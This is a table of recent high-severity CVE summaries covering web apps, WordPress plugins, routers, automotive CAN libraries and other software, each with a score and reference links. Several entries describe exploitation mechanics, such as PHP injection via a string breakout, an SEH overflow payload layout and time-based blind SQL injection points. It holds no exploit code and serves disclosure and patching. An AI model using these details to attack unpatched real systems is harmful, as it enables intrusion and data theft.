| opencats--OpenCATS | OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter. Attackers can break out of the define() string context in config.php using a single quote and statement separator to inject malicious PHP code that persists and executes on every subsequent page load when the installation wizard remains incomplete. | 2026-04-28 | 8.1 | CVE-2026-27760 | https://chocapikk.com/posts/2026/opencats-installer-rce/ https://github.com/opencats/OpenCATS/pull/706 https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6 https://github.com/opencats/OpenCATS/blob/46e4727/lib/CATSUtility.php#L142-L172 https://github.com/opencats/OpenCATS/blob/46e4727/modules/install/ajax/ui.php#L130 https://www.vulncheck.com/advisories/opencats-php-code-injection-via-installer-ajax-endpoint |
| Milesight--MS-Cxx63-PD | Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials. | 2026-04-27 | 8.8 | CVE-2026-27785 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| Cockpit--Cockpit CMS | Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server. | 2026-04-29 | 8.8 | CVE-2026-34965 | https://github.com/agentejo/cockpit https://gist.github.com/thepiyushkumarshukla/64d2318518b17f529bc3ccb11fd5be90 https://github.com/agentejo/cockpit/commits/494765e4f0fb9484f320aee0c6ee889b6fa789b9 https://www.vulncheck.com/advisories/cockpit-cms-authenticated-remote-code-execution-via-collections |
| n/a--(UDS) & OBD-II (On Board Diagnostics for Vehicles) | miaofng/uds-c commit e506334e270d77b20c0bc259ac6c7d8c9b702b7a (2016-10-05) contains a stack buffer overflow in send_diagnostic_request. A 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) receives memcpy at offset 1+pid_length with payload_length bytes. MAX_UDS_REQUEST_PAYLOAD_LENGTH=7, so 1+2+7=10 exceeds buffer by 4 bytes. No bounds check on payload_length before memcpy. | 2026-05-01 | 8.8 | CVE-2026-37536 | https://github.com/miaofng/uds-c https://github.com/openxc/uds-c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--Open-SAE-J1939 (Daniel Martensson) | collin80/Open-SAE-J1939 thru commit 744024d4306bc387857dfce439558336806acb06 (2023-03-08) contains an integer underflow leading to out-of-bounds write in Transport Protocol Data Transfer handling. At line 23: uint8_t index = data[0] - 1. When data[0] (sequence number from CAN frame) is 0, index underflows to 255. Subsequent write at tp_dt->data[255*7 + i-1] reaches offset 1791, exceeding the MAX_TP_DT buffer (1785 bytes) by 6 bytes. | 2026-05-01 | 8.1 | CVE-2026-37537 | https://github.com/DanielMartensson/Open-SAE-J1939 https://github.com/collin80/Open-SAE-J1939 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| openampproject[.]org--OpenAMP v2025.10.0 | OpenAMP v2025.10.0 ELF loader contains an integer overflow vulnerability in firmware image parsing. In elf_loader.c, it performs multiplication of two attacker-controlled 16-bit values from the ELF header without overflow checking. On 32-bit embedded systems (STM32MP1, Zynq, i.MX), large values can cause the product to wrap around to a small value. | 2026-05-01 | 8.4 | CVE-2026-37540 | https://github.com/OpenAMP/open-amp https://github.com/OpenAMP/open-amp/blob/main/lib/remoteproc/elf_loader.c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--MixPHP Framework 2.x | Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The sync-invoke TCP server (Server.php:87) receives data from a TCP socket, passes it directly to Opis\Closure\unserialize(), then executes the result via call_user_func(). No authentication or signature verification exists on the TCP connection. An attacker with access to the localhost TCP port (server binds 127.0.0.1) can send a crafted serialized PHP closure to achieve arbitrary code execution. | 2026-05-01 | 8.4 | CVE-2026-37552 | https://github.com/mix-php/mix https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975 |
| benjaminprojas--WP Editor | The WP Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9.2. This is due to missing nonce verification in the 'add_plugins_page' and 'add_themes_page' functions. This makes it possible for unauthenticated attackers to overwrite arbitrary plugin and theme PHP files with attacker-controlled code via a forged request, granted they can trick a site administrator into performing an action such as clicking a link. | 2026-05-01 | 8.8 | CVE-2026-3772 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b1bc4a87-d5de-4d66-9cc5-802ef11f886c?source=cve https://plugins.trac.wordpress.org/browser/wp-editor/trunk/classes/WPEditorPlugins.php#L60 https://plugins.trac.wordpress.org/browser/wp-editor/trunk/classes/WPEditorThemes.php#L103 https://plugins.trac.wordpress.org/changeset/3480577/ |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0. | 2026-04-30 | 8.1 | CVE-2026-40600 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| TRENDnet--TEW-821DAP | A security vulnerability has been detected in TRENDnet TEW-821DAP 1.12B01. Impacted is the function auto_update_firmware of the component Firmware Update. The manipulation of the argument str leads to buffer overflow. The attack may be initiated remotely. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 8.8 | CVE-2026-7607 | VDB-360564 | TRENDnet TEW-821DAP Firmware Udpate auto_update_firmware buffer overflow VDB-360564 | CTI Indicators (IOB, IOC, IOA) Submit #806214 | Trendnet TEW-821DAP v1.12B01 CWE-120 Buffer Copy without Checking Size of Input https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_BO.md |
| carazo--Import and export users and customers | The Import and export users and customers plugin for WordPress is vulnerable to Privilege Escalation in all versions up to and including 2.0.8 via the `save_extra_user_profile_fields()` function. This is due to an incomplete blocklist that correctly restricts capability meta keys for the primary site (e.g., `wp_capabilities`, `wp_user_level`) but fails to block the equivalent meta keys for any other subsite in a WordPress Multisite network (e.g., `wp_2_capabilities`, `wp_2_user_level`), allowing these keys to pass the `in_array()` check and be written directly to user meta via `update_user_meta()`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate their privileges to Administrator on any subsite within the Multisite network by submitting a crafted profile update to `/wp-admin/profile.php`. Exploitation requires that an administrator has previously imported a CSV file containing multisite-prefixed capability column headers and has enabled the 'Show fields in profile?' option, which causes those keys to be stored in the `acui_columns` option and exposed as editable fields on the user profile page. | 2026-05-02 | 8.8 | CVE-2026-7641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/368cff00-6a86-443e-aec4-4115a229a3c1?source=cve https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/trunk/classes/multisite.php#L21 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.8/classes/multisite.php#L21 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/columns.php#L221 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/columns.php#L198 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/helper.php#L150 https://plugins.trac.wordpress.org/browser/import-users-from-csv-with-meta/tags/2.0.6/classes/multisite.php#L21 https://plugins.trac.wordpress.org/changeset/3515646 |
| Cozmoslabs--Profile Builder Pro | The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP's maybe_unserialize() function on the attacker-controlled 'args' POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory. | 2026-05-02 | 8.1 | CVE-2026-7647 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7b897f5-f988-4515-83bc-456f041d7e2e?source=cve https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L271 https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L271 https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L13 https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L13 |
| Shenzhen Libituo Technology--LBT-T300-HW1 | A flaw has been found in Shenzhen Libituo Technology LBT-T300-HW1 up to 1.2.8. This issue affects the function start_single_service of the component Web Management Interface. Manipulation of the argument vpn_pptp_server/vpn_l2tp_server can lead to a buffer overflow. The attack can be executed remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7674 | VDB-360827 | Shenzhen Libituo Technology LBT-T300-HW1 Web Management start_single_service buffer overflow VDB-360827 | CTI Indicators (IOB, IOC, IOA) Submit #800705 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow Submit #800706 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow (Duplicate) https://github.com/hmKunlun/lbt-t300-hw1/blob/main/reselov_vpn_server%EF%BC%88vpn_pptp_server%EF%BC%89.md |
| Shenzhen Libituo Technology--LBT-T300-HW1 | A vulnerability has been found in Shenzhen Libituo Technology LBT-T300-HW1 up to 1.2.8. Impacted is the function start_lan of the file /apply.cgi. The manipulation of the argument Channel/ApCliSsid leads to a buffer overflow. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7675 | VDB-360828 | Shenzhen Libituo Technology LBT-T300-HW1 apply.cgi start_lan buffer overflow VDB-360828 | CTI Indicators (IOB, IOC, IOA) Submit #800708 | Libtor Technology lbt-t300-hw1 <=V1.2.8 Buffer Overflow Submit #800709 | Libtor Technology <=V1.2.8 Buffer Overflow (Duplicate) https://github.com/hmKunlun/lbt-t300-hw1/blob/main/generate_conf_router(Channel).md |
| Edimax--BR-6428nC | A security vulnerability has been detected in Edimax BR-6428nC up to 1.16. This impacts an unknown function of the file /goform/setWAN. Such manipulation of the argument pptpDfGateway leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7684 | VDB-360843 | Edimax BR-6428nC setWAN buffer overflow VDB-360843 | CTI Indicators (IOB, IOC, IOA) Submit #801599 | Edimax BR-6428nC v1.16 Buffer Overflow https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpDfGateway-Stack-Overflow-33db5c52018a80c1835dd4fab4b6c7f2 |
| Edimax--BR-6208AC | A vulnerability was detected in Edimax BR-6208AC up to 1.02. Affected is an unknown function of the file /goform/setWAN. Performing a manipulation of the argument pptpDfGateway results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 8.8 | CVE-2026-7685 | VDB-360844 | Edimax BR-6208AC setWAN buffer overflow VDB-360844 | CTI Indicators (IOB, IOC, IOA) Submit #801606 | Edimax BR-6208AC V2_1.02 Buffer Overflow https://tzh00203.notion.site/Edimax-BR-6428nC-v1-16-setWAN-pptpDfGateway-Stack-Overflow-33db5c52018a80c1835dd4fab4b6c7f2 |
| Alloksoft--Allok AVI to DVD SVCD VCD Converter | Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with junk data, NSEH bypass, SEH handler address, and shellcode that triggers the overflow when pasted into the License Name field and the Register button is clicked, resulting in code execution. | 2026-04-29 | 7.8 | CVE-2018-25302 | ExploitDB-44549 Official Product Homepage VulnCheck Advisory: Allok AVI to DVD SVCD VCD Converter 4.0.1217 Buffer Overflow SEH |
| mybb--MyBB Recent threads | MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts by creating threads with crafted subject lines. Attackers can create threads with script tags in the subject parameter to execute arbitrary JavaScript in the browsers of all users viewing the index page. | 2026-04-29 | 7.2 | CVE-2018-25309 | ExploitDB-44420 Product Reference VulnCheck Advisory: MyBB Recent threads 17.0 Persistent Cross-Site Scripting |
| Weaver Network Co., Ltd.--E-cology | Weaver (Fanwei) E-cology 9.5 versions prior to 10.52 contain an arbitrary file read vulnerability in the XmlRpcServlet interface at the XML-RPC endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying file paths to the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods. Attackers can exploit these methods without authentication to retrieve sensitive files including system configuration files and database credentials from the server. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-12-14 (UTC). | 2026-04-30 | 7.5 | CVE-2022-50992 | https://www.weaver.com.cn/cs/securityDownload.html# https://www.weaver.com.cn/cs/ecology_full_log.html https://www.cnvd.org.cn/flaw/show/CNVD-2022-43245 https://blog.csdn.net/qq_36618918/article/details/135104295 https://blog.csdn.net/xiayu729100940/article/details/135205082 https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-arbitrary-file-read-via-xmlrpcservlet |
| n/a--django-mdeditor | All versions of the package django-mdeditor are vulnerable to Missing Authentication for Critical Function in the image upload endpoint. An attacker can upload malicious files and achieve arbitrary code execution since this endpoint lacks authentication protection and proper sanitisation of file names. | 2026-04-30 | 7.1 | CVE-2025-13030 | https://security.snyk.io/vuln/SNYK-PYTHON-DJANGOMDEDITOR-8630926 https://github.com/pylixm/django-mdeditor/blob/e8dd73fb8571ddff2e7a20a4bfa88c376cc33b62/mdeditor/views.py%23L25 https://github.com/pylixm/django-mdeditor/issues/151 https://github.com/pylixm/django-mdeditor/pull/185 https://github.com/pylixm/django-mdeditor/commit/3e80f9edcabc5d2fc136b05a501964b8a5e97cfe |
| CryptPad--CryptPad | CryptPad 2025.3.1 allows unbounded WebSocket frame flood. A remote, unauthenticated attacker can significantly degrade or deny service for all users of a CryptPad instance. Fixed in 2026.2.2. | 2026-04-30 | 7.5 | CVE-2025-51846 | |
| Zyxel--DX3301-T0 firmware | A post-authentication command injection vulnerability in the "DomainName" parameter of the DHCP configuration file in Zyxel DX3301-T0 and EX3301-T0 firmware versions through 5.50(ABVY.7.1)C0 could allow an authenticated attacker with administrator privileges to execute OS commands on an affected device. | 2026-04-28 | 7.2 | CVE-2026-1460 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-and-wireless-extenders-04-28-2026 |
| OPPO--ColorOS Assistant | ColorOS Assistant has an unauthenticated start-download channel, leading to file path traversal. | 2026-04-30 | 7.1 | CVE-2026-22070 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-2049764240746881024 |
| VEGA Grieshaber--VEGAPULS 6X Two-wire PROFINET, Modbus TCP, OPC UA (Ethernet-APL) | An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes. | 2026-04-28 | 7.5 | CVE-2026-3323 | https://certvde.com/en/advisories/VDE-2026-016 https://vega.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-016.json |
| redhat[.]com--DTLS | A flaw in GnuTLS DTLS handshake parsing allows malformed fragments with zero length and non-zero offset, leading to an integer underflow during reassembly and resulting in an out-of-bounds read. This issue is remotely exploitable and may cause information disclosure or denial of service. | 2026-04-30 | 7.5 | CVE-2026-33845 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-33845 RHBZ#2450624 |
| Dell--iDRAC10 | Dell iDRAC10, versions 1.20.70.50 and 1.30.05.10, contains an Insufficiently Protected Credentials vulnerability. A race condition vulnerability exists that could allow an authenticated low-privileged attacker to gain elevated access. | 2026-04-29 | 7.1 | CVE-2026-35155 | https://www.dell.com/support/kbdoc/en-us/000452298/dsa-2026-187-security-update-for-dell-idrac10-vulnerability |
| n/a--Automotive Grade Linux (AGL) afb-daemon v19.90.0 | AGL app-framework-binder (afb-daemon) through v19.90.0 contains a privilege escalation vulnerability in the supervision Do command. The on_supervision_call function in src/afb-supervision.c explicitly nullifies the request credentials by calling afb_context_change_cred(&xreq->context, NULL) before dispatching an attacker-controlled API call via xapi->itf->call(xapi->closure, xreq). The NULL propagation chain through afb-context.c:110 (context->credentials = afb_cred_addref(NULL)) and afb-cred.c:163 (returns NULL when cred is NULL) confirms that credentials are zeroed before the target API executes. The attacker controls both api and verb parameters via JSON input, allowing execution of any registered API with a NULL credential context. APIs that rely on context->credentials for authorization decisions may fail open when receiving NULL credentials, enabling privilege escalation. This vulnerability was introduced in commit abbb4599f0b921c6f434b6bd02bcfb277eecf745 on 2018-02-14. | 2026-05-01 | 7.8 | CVE-2026-37525 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) afb-daemon v19.90.0 | AGL app-framework-binder (afb-daemon) through v19.90.0 allows any local process to execute privileged supervision commands (Exit, Do, Sclose, Config, Trace, Debug, Token, slist) without authentication via the abstract Unix socket @urn:AGL:afs:supervision:socket. The on_supervision_call function in src/afb-supervision.c dispatches all 8 commands without any credential verification. The abstract socket has no DAC protection, as acknowledged in the official CAUTION comment in src/afs-supervision.h. This allows a low-privileged local process to kill the daemon (DoS via Exit command), execute arbitrary API calls (via Do command), close arbitrary user sessions (via Sclose command), or leak the entire global configuration (via Config command). The vulnerability was introduced in commit b8c9d5de384efcfa53ebdb3f0053d7b3723777e1 on 2017-06-29. | 2026-05-01 | 7.8 | CVE-2026-37526 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-binder https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) aglservice v17.1.12 | AGL agl-service-can-low-level thru 17.1.12 contains a heap buffer over-read in the isotp-c library. In isotp_continue_receive (receive.c:87-89), the payload_length for a Single Frame is extracted from a 4-bit nibble in the CAN frame data, yielding values 0-15. However, a standard CAN frame is only 8 bytes, with payload starting at data[1] (7 bytes available). When payload_length exceeds the available data (e.g., nibble=15 but only 7 payload bytes exist), memcpy(message.payload, &data[1], payload_length) reads up to 8 bytes past the end of the data buffer. | 2026-05-01 | 7.1 | CVE-2026-37532 | https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Grade Linux (AGL) isotp-c | openxc/isotp-c thru commit 5a5d19245f65189202719321facd49ce6f5d46ac (2021-08-09) contains an out-of-bounds read in the ISO-TP Single Frame receive handler, where the 4-bit payload length nibble is used directly as the memcpy size without validating it against the actual CAN data length. A malicious CAN frame with an oversized length nibble can cause memory reads beyond the buffer, allowing attackers to cause a denial of service, or gain sensitive information. | 2026-05-01 | 7.1 | CVE-2026-37535 | https://github.com/openxc/isotp-c https://github.com/openxc/isotp-c/blob/master/src/isotp/receive.c https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--Vanetza V2X v26.02 | An issue was discovered in Vanetza V2X v26.02 allowing remote unauthorized attackers to cause a denial of service. The vulnerability exists in the GeoNetworking packet processing pipeline where OpenSSL exceptions from ECC point validation (invalid compressed point, point not on curve) are not properly caught by the Router::indicate() call chain. The openssl_wrapper.cpp check() function (line 19) throws openssl::Exception when OpenSSL operations fail. The parser's catch block in parse_secured() should catch these, but the exception escapes through subsequent processing stages (indicate_common, indicate_extended). This causes std::terminate, crashing the V2X receiver. | 2026-05-01 | 7.5 | CVE-2026-37554 | https://github.com/riebl/vanetza https://github.com/riebl/vanetza/blob/master/vanetza/security/openssl_wrapper.cpp https://github.com/riebl/vanetza/blob/master/vanetza/geonet/router.cpp https://gist.github.com/sgInnora/45128ae15d52df7238680a8f2da8359f |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes public chart retrieval and export routes that only verify project-level public access and, for exports, a team-level export toggle. The routes do not verify whether the target chart is actually allowed on the public report or whether the governing SharePolicy permits public access. An unauthenticated attacker who knows a chart identifier in a public project can read or export chart data for charts that were intentionally hidden from the report. This issue has been patched in version 5.0.0. | 2026-04-30 | 7.5 | CVE-2026-40595 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mq7q-6xh6-5649 https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'sort' parameter in all versions up to, and including, 1.13.18. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. The `esc_sql()` function is applied but is ineffective in the `ORDER BY` context because the value is not enclosed in quotes. Additionally, while a `sanitize_sort_arg()` allowlist-based sanitizer was added in version 1.13.18, it is only applied in the AJAX code path (`sanitize_query_args()`) and not in the `render-map.php` or template tag code paths. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. | 2026-05-02 | 7.5 | CVE-2026-4060 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1767 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1785 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/render-map.php#L166 https://plugins.trac.wordpress.org/changeset/3503627/ |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew exposes POST /api/chart/:chart_id/query without authentication. The endpoint only checks team.allowReportRefresh and does not verify that the target chart belongs to a public report, that the project is public, or that sharing policy allows the operation. An unauthenticated attacker who knows a chart identifier can trigger a data refresh and retrieve the current data of private charts. This issue has been patched in version 5.0.0. | 2026-04-30 | 7.5 | CVE-2026-40601 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-cpr6-mhgm-893w https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'map_post_type' parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb->prepare()`. The 'any' branch of the same code correctly applies `array_map('esc_sql', ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings. | 2026-05-02 | 7.5 | CVE-2026-4061 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc3cf6c5-643e-49ca-b09c-bd7cfec328ee?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1748 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Hooks/SearchResults.php#L39 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Search.php#L152 https://plugins.trac.wordpress.org/changeset/3503627/ |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'object_ids' and 'exclude_object_ids' parameters in all versions up to, and including, 1.13.18. This is due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. The `esc_sql()` function is applied but is ineffective because the values are placed in an unquoted `IN(...)` / `NOT IN(...)` SQL context - `esc_sql()` only escapes quote characters and provides no protection against parenthesis or SQL keyword injection. Additionally, while a numeric-only sanitizer exists in `sanitize_query_args()`, it is only applied in the AJAX code path and not in the `render-map.php` or template tag code paths. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. | 2026-05-02 | 7.5 | CVE-2026-4062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/abc5ed0a-504f-4d8c-9662-a4c9f7c7acb8?source=cve https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1755 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1759 https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/render-map.php#L166 https://plugins.trac.wordpress.org/changeset/3503627/ |
| n/a--libssh2 | A security vulnerability has been detected in libssh2 up to 1.11.1. The impacted element is the function userauth_password of the file src/userauth.c. Such manipulation of the argument username_len/password_len leads to integer overflow. The attack may be launched remotely. The name of the patch is 256d04b60d80bf1190e96b0ad1e91b2174d744b1. A patch should be applied to remediate this issue. | 2026-05-01 | 7.3 | CVE-2026-7598 | VDB-360555; libssh2 userauth.c userauth_password integer overflow VDB-360555; CTI Indicators (IOB, IOC, IOA) Submit #805564; libssh2 <= 1.11.1 Integer Overflow https://github.com/libssh2/libssh2/pull/1858 https://github.com/libssh2/libssh2/commit/256d04b60d80bf1190e96b0ad1e91b2174d744b1 https://github.com/libssh2/libssh2/ |
| innocommerce--InnoShop | A vulnerability has been found in innocommerce InnoShop up to 0.7.8. The affected element is the function InstallServiceProvider::boot of the file innopacks/install/src/InstallServiceProvider.php of the component Installation Endpoint. The manipulation leads to improper authentication. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The identifier of the patch is 45758e4ec22451ab944ae2ae826b1e70f6450dc9. It is recommended to apply a patch to fix this issue. | 2026-05-02 | 7.3 | CVE-2026-7630 | VDB-360576; innocommerce InnoShop Installation Endpoint InstallServiceProvider.php boot improper authentication VDB-360576; CTI Indicators (IOB, IOC, IOA) Submit #806484; innocommerce innoshop <= 0.7.3 Missing Authorization https://github.com/innocommerce/innoshop/issues/314 https://github.com/innocommerce/innoshop/issues/314#issuecomment-4357464458 https://github.com/innocommerce/innoshop/commit/45758e4ec22451ab944ae2ae826b1e70f6450dc9 https://github.com/innocommerce/innoshop/ |
| code-projects--Online Hospital Management System | A vulnerability was determined in code-projects Online Hospital Management System 1.0. This affects an unknown function of the file /viewappointment.php. This manipulation of the argument delid causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-02 | 7.3 | CVE-2026-7632 | VDB-360578; code-projects Online Hospital Management System viewappointment.php sql injection VDB-360578; CTI Indicators (IOB, IOC, TTP, IOA) Submit #806633; code-projects Online Hospital Management System In PHP 1.0 SQL Injection https://github.com/Sh1tKing/cve/blob/main/time-blind-sql.md https://github.com/Sh1tKing/cve/blob/main/CVE-2026-7632.md https://code-projects.org/ |
| ChatGPTNextWeb--NextChat | A vulnerability has been found in ChatGPTNextWeb NextChat up to 2.16.1. Affected is the function addMcpServer of the file app/mcp/actions.ts. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 7.3 | CVE-2026-7644 | VDB-360756; ChatGPTNextWeb NextChat actions.ts addMcpServer improper authorization VDB-360756; CTI Indicators (IOB, IOC, TTP, IOA) Submit #806851; ChatGPTNextWeb NextChat 2.16.1 Unauthenticated Remote Code Execution https://github.com/ChatGPTNextWeb/NextChat/issues/6757 https://github.com/ChatGPTNextWeb/NextChat/ |
| reputeinfosystems--ARMember Membership Plugin, Content Restriction, Member Levels, User Profile & User signup | The ARMember - Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 4.0.60 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-02 | 7.5 | CVE-2026-7649 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb064156-f54b-4401-9d4f-29f0952deb24?source=cve https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_members_directory.php#L1019 https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_members_directory.php#L1019 